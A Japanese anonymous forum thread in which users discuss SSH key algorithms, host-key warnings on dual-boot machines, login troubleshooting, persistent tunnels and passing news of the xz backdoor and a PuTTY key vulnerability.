1990年代から開発され、20年以上の歴史があるソフトらしく結構枯れたアプリのように思える。
使ったことのない方はぜひ一度試してみることをおすすめする。
0585名無しさん@お腹いっぱい。
垢版 |
2023/09/10(日) 14:04:25.25
ずっとsshでトンネリングしてきたけど時流に乗ってvpnもやってみるかと調べていたらIKEv2というのがセキュリティが高いとか出てきたが文字列で認証って……
文字列のどこがセキュリティ高いのか訳がわからん
0586名無しさん@お腹いっぱい。
垢版 |
2023/09/10(日) 20:58:23.24
文字列って事前共有鍵?
0588名無しさん@お腹いっぱい。
垢版 |
2023/09/11(月) 00:43:15.41
何が言いたいのわからん。
文字列はバイナリに変換できるし、バイナリは文字列に変換できる。
文字列の何が気に入らないの?
0590名無しさん@お腹いっぱい。
垢版 |
2023/09/12(火) 08:51:32.17
>>589
RSA は公開鍵暗号で公開が前提なのと暗号強度はそれほど強くないので長くする必要がある。
暗号はアルゴルズムによるので長さを比較するのは無意味
0591名無しさん@お腹いっぱい。
垢版 |
2023/09/12(火) 11:09:12.97
公開鍵認証は現段階では ED25519 一択と思っていた。ら、使えないところあるのね。困ったもんだ。
0592名無しさん@お腹いっぱい。
垢版 |
2023/09/12(火) 12:26:49.09
事前共有キーはssh のパスフレーズ認証感があって嫌
感覚でしかないが
0593名無しさん@お腹いっぱい。
垢版 |
2023/09/12(火) 19:41:52.25
ん、もしかしてsshも文字数がそこそこあればパスフレーズ認証の方が強いのか???
0596名無しさん@お腹いっぱい。
垢版 |
2023/09/13(水) 06:18:05.08
>>595
私の知識では
ED25519 は2の128乗の強さ
RSA 4096 は2の140乗の強さ
なので、強さだけで言うと RSA 4096 のほうが強いけど実際の鍵の短さ、速度の面で ED25519 のほうが有利。
なおRSA 2048 は量子コンピュータで解析できそうなので 2031年(2030年だったかも)以降は使用しないように勧告が出ていたはず。
いまのうちに ED25519 に乗り換えておけば長い間メンテをサボれるw(かもしれない)。
0597名無しさん@お腹いっぱい。
垢版 |
2023/09/13(水) 08:54:26.14
暗号の強さは計算強度だけによるものではない。その暗号がどれくらい研究されて攻撃手段が確立されているかに依存する。
そういう意味で古い暗号であるRSAはかなり不利。
0598名無しさん@お腹いっぱい。
垢版 |
2023/09/13(水) 12:32:58.67
逆に研究され続けても使われている枯れた技術は強いかもしれん
新しい暗号の弱点が唐突に見つかる可能性もあるし
0599名無しさん@お腹いっぱい。
垢版 |
2023/09/13(水) 15:21:55.38
>>596
なお、現在主流の RSA 2048 の暗号強度は 112bit だから
一般的に言えば ED25519 は RSA より暗号強度は高いと言っても間違いではないと思う。
0604名無しさん@お腹いっぱい。
垢版 |
2023/09/15(金) 03:41:29.34
>>600
どっかのwebサイトで読んだんだがビット数を増やしていっても素数の数があまり増えないせいでRSAのビット数を増やしても暗号強度があまり増えないらしいよ。
0607名無しさん@お腹いっぱい。
垢版 |
2023/11/27(月) 00:42:27.14
一人で複数の端末からアクセスする場合、鍵は1つを使い回すほうが良いのか個別に作るほうが良いのかどっちだったっけ?
昔、調べたような気がするけど忘れてしまった
0608名無しさん@お腹いっぱい。
垢版 |
2023/11/27(月) 09:22:38.98
個別に作る方が良いよ

どれかの端末が盗難されたり不正侵入されたりで鍵が漏洩した場合に、
その端末用の鍵を無効化するだけでよくなる
0609名無しさん@お腹いっぱい。
垢版 |
2023/11/27(月) 20:30:31.36
>>604
だからこそまだ伸び代のあるED25519はビット数をちょっと増やせばRSAを突き放せるはずなのに…
速いし暗号強度も強ければ最強になれるのに
0611名無しさん@お腹いっぱい。
垢版 |
2023/12/23(土) 22:59:49.20
WindowsとLinux(A)をデュアルブートにしようと思います
更にWindowsにはwslを使ってLinux(B)をインストールしようと思います
AとBは同時に起動することはないので同じホスト名にしようかと検討しています
リモートからsshを使ってあるときはAに接続したり
別のときにはBに接続したりするのですが
これってWARNING: REMOTE HOST IDENTIFICATION HAS CHANGED!が出ますよね?
ホスト名はAとBで変えるべきでしょうかね?
0612名無しさん@お腹いっぱい。
垢版 |
2023/12/24(日) 08:25:18.64
sshに限らず、ポカミスの可能性をちょっととでも減らす意味で、別名にしたほうが無難だと思うな
その上で、何らかのクライアントからどうしても同一名でアクセスしなけりゃならんのなら
ネーム鯖なりクライアントのhostsで別名をつければいいんだし
0613名無しさん@お腹いっぱい。
垢版 |
2023/12/24(日) 11:35:28.12
>>612
レスありがとうございます
なるほどーよく分かりました

動機としては名前を考えるのが面倒くさいw
やはり別名つけることにします
0614名無しさん@お腹いっぱい。
垢版 |
2023/12/26(火) 19:58:24.53
AとBで同じサーバーキー(/etc/ssh/ssh_host_key)使えば警告は出ない
0615名無しさん@お腹いっぱい。
垢版 |
2023/12/26(火) 21:13:30.66
>>614
有難うございます
なるほどたぶんそうだろうなと推測してたのですが
具体的なファイル名を教えて頂きまして
ありがとうございました
0616名無しさん@お腹いっぱい。
垢版 |
2023/12/27(水) 01:24:16.98
複数のマシンで同じ秘密鍵を使うのは良くないんじゃない?
片方のマシンの秘密鍵が漏れたらもう片方のマシンの秘密鍵が漏れたことになる。
0617名無しさん@お腹いっぱい。
垢版 |
2023/12/27(水) 03:53:44.23
凡ミス防止にホスト名分けたほうがいいのは同意だけど、known_hostsって同じホスト名に複数公開鍵登録できなかったっけ?
0618名無しさん@お腹いっぱい。
垢版 |
2023/12/27(水) 17:08:10.09
>>616
今回のケースは物理的には同じマシンなので、ホスト鍵が漏れる状況ならどのみちもう片側も安全とは言い難いのでは
0619名無しさん@お腹いっぱい。
垢版 |
2023/12/28(木) 01:09:42.12
>>611
同じホスト名なのに中身が前回と変わっていることに気づくための機能なので
デュアルブートのような場合は、まさに該当しますよね
WARNINGが出るのが当然なので、それが嫌ならホスト名を変えるべきでしょう
0620名無しさん@お腹いっぱい。
垢版 |
2024/01/02(火) 17:56:15.69
IPアドレスをDHCPで割り当てていると、DHCPサーバは前回割り当てたアドレスを優先的に割り当てる
DHCPサーバ対してパラメータを渡すことで異なるアドレスの配布を受けることもできるけど、
(やったことないからわからないし)DHCPサーバは普通市販ルータにやらせているだろうから面倒そう
クライアント側で可能な解決方法は、同じサーバキーを使う、スタティックにアドレスを割り当てる、mDNSに逃げる
0621611
垢版 |
2024/01/02(火) 21:06:24.90
>>613に書いたように別名をつけたのですが
みなさん有難うございます
大変勉強になります
0622名無しさん@お腹いっぱい。
垢版 |
2024/01/05(金) 16:46:46.10
すみません、質問させてください。

在宅研修としてVMwareでLinuxsの仮想サーバーを構築しています。
年末まで自主学習ののち、三日時間を空けて昨日TeraTermでSSH接続を試みたのですができませんでした。
ウェブコンソールから任意のユーザー名のパスフレーズを変更することで一時は繋がったのですが、
その後また繋がらず。
一晩おいた今日は繋がったのですが、TeraTermが落ちた後から再度繋がらなくなっています。
(TeraTermの接続が不安定です)
接続が不安定になるまでに行っていた課題の内容は「セキュリティを考慮してrootからのログインを無効にする」です。
年末にroot以外のユーザーを2つ作成するところまで行い、その後年始に起動したらこうなっていました。

TeraTermが繋がらないときの流れは、
取得したドメインとポート入力OK→その後の画面でユーザー名とパスフレーズを入力がダメという感じです。
エラーメッセージは「認証に失敗しました。再試行してください」です。
このエラーメッセージがパスフレーズが間違っているときのものなのは分かるのですが、
パスフレーズは正しいですし繋がるときと繋がらないときがあるのもよく分かりません。
swacthを停止させても直りません。

会社でもお手上げだと……。
去年の年末にITの会社に入り、知識も解決力もないのでご助言頂けると幸いです。
0624名無しさん@お腹いっぱい。
垢版 |
2024/01/06(土) 06:48:48.54
適当に丸めないで、エラーメッセージを全部生で見せてほしい
見せられない部分は *** とか example.com とかに置き換えてもいいから

あと、ドメイン取ってるってのも気になるな
localhostじゃなくて、どこかに作ってるんだろうが、IP直打ちじゃダメなのか?
0625名無しさん@お腹いっぱい。
垢版 |
2024/01/06(土) 12:57:29.88
貧弱なネットが正月休みの負荷に耐えられなかった感じがするのはオレだけ?
0626名無しさん@お腹いっぱい。
垢版 |
2024/01/07(日) 02:50:05.20
teraterm がダメなら rlogin や putty ではどうなの
そのLinux仮想マシンのIPアドレスの設定はどうやっているの? IPv4のみ? v6は?知らない間にv6も有効になってる?
teratermで接続するときはホスト名?それともIPアドレス?
ウェブコンソールは何?Webmin ? cockpit ?なんでもいいけど、それを使ってシェル(ターミナル)は開ける?開けるならそれでsshdのログを見れない?

Linuxのディストリ(CentOSとかUbuntuとか、とバージョン)も開示する方が答えが得やすい。何故ならもろもろ推測しやすいから
0627名無しさん@お腹いっぱい。
垢版 |
2024/01/07(日) 18:27:43.58
>>622
同じFQDNに複数のサーバーがある(A、B、C)
622はAにだけログインできるので、ラウンドロビンでB、Cに接続してしまった場合ログインできない
とか?
0628名無しさん@お腹いっぱい。
垢版 |
2024/01/22(月) 22:21:54.26
sidedoor を使って常時sshトンネルを張るように出来たんだけど
https://github.com/daradib/sidedoor
これ、sshを一個しか実行できないように見える。
複数のホストにsshトンネルを張れるものって何かないだろうか
0630名無しさん@お腹いっぱい。
垢版 |
2024/01/24(水) 02:16:49.04
autosshはsystemdの設定が面倒なのでsidedoorを使ってみた
0631名無しさん@お腹いっぱい。
垢版 |
2024/03/06(水) 23:40:42.84
WindowsのOpensshってLast Loginを表示してくれないの?
PrintLastLogをyesにしても何も出ない…
0632名無しさん@お腹いっぱい。
垢版 |
2024/03/27(水) 20:09:21.03
見たいルックスでもなかった気に食わないやつだと思う
こどおじなんてそっちのけ、運営が有名人が多くて
実はスイカの方がいいじゃないかと思うよ
政治の話
0634名無しさん@お腹いっぱい。
垢版 |
2024/03/27(水) 20:36:10.58
楽しみ方が良いのかもな
0637名無しさん@お腹いっぱい。
垢版 |
2024/03/31(日) 00:54:07.09
こんな板にもスクリプトが来るのか…
0639名無しさん@お腹いっぱい。
垢版 |
2024/04/04(木) 02:22:18.49
>>638
このバックドア、「OpenSSHをはじめ」どころかsshを狙い撃ちのバックドアのようですね
0640名無しさん@お腹いっぱい。
垢版 |
2024/04/04(木) 08:24:43.56
>>638
5.6とか新しいの入ってないでしょ
0641名無しさん@お腹いっぱい。
垢版 |
2024/04/13(土) 23:44:51.13
これ、たまたま変じゃね?って気づいたから良かったけど、同じようなことが発覚せずバックドアとして存在しているんだろうな
0642名無しさん@お腹いっぱい。
垢版 |
2024/04/16(火) 14:20:05.26
CVE-2024-31497……

やっぱりRSAが安心だなw
0645名無しさん@お腹いっぱい。
垢版 |
2024/04/18(木) 00:00:41.12
>>644
今回の件でいえば別物

署名60個ってのは60回ログインしてたらコンプされてる?
0647名無しさん@お腹いっぱい。
垢版 |
2024/04/21(日) 16:02:28.87
乱数を得るのにSHA-512を使ってた。P-256 P-384 には足りてたが P-521 には9bit足りないのを忘れてた。
ってことか。
レスを投稿する